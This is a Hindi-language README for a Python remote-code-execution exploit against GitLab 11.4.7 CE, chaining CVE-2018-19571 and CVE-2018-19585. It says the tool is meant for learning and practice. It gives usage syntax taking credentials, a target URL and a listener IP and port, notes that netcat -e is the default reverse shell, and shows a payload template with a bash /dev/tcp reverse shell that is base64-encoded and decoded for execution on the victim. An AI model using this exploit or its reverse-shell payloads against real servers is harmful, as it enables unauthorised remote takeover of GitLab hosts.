
GitLab 11.4.7 RCE exploit विभिन्न reverse shells के साथ। CVE-2018-19571 + CVE-2018-19585
GitLab 11.4.7 CE RCE एक्सप्लॉइट विभिन्न रिवर्स शेल के साथ। CVE-2018-19571: https://nvd.nist.gov/vuln/detail/CVE-2018-19571 CVE-2018-19585: https://nvd.nist.gov/vuln/detail/CVE-2018-19585
Sam Redmond और Tam Lai Yin के संस्करण का संशोधन, सीखने और अभ्यास करने के लिए।
यह python3 में लिखा गया है, जैसा कि सब कुछ होना चाहिए।
निर्भरताएँ:
pip3 install requests
उपयोग:
python3 rce_script.py -u <username> -p <password> -g <url:port> -l <local ip> -P <local port> [<shell lang>]
डिफ़ॉल्ट रूप से, netcat का -e विकल्प वाला शेल उपयोग किया जाता है।
वर्तमान अंतर्निहित शेल:
कुछ शेल में ऐसे अक्षर होते हैं जो अनुरोध एन्कोडिंग के साथ मेल नहीं खाते। इसलिए उन्हें Base64 में एन्कोड किया जाता है और फिर डिकोड करके पीड़ित की मशीन पर निष्पादित किया जाता है।
यदि आप अपना स्वयं का शेल जोड़ना चाहते हैं, तो payloads_dict संरचना में एक मान जोड़ें।
आपको निम्नलिखित परिभाषित करना होगा:
'bash': {
# If the raw_payload can be executed withoud encoding
'safe': False,
# Payload, must contain the references for the local_ip and for the local_port
'raw_payload': 'bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1',
# How to execute the payload if safe is False. Must conatin the reference for payload
'exec_string': 'echo {payload} | base64 -d | /bin/bash'
}
HTML पार्सिंग काफी हार्डकोडेड है, यह आसानी से टूट सकता है।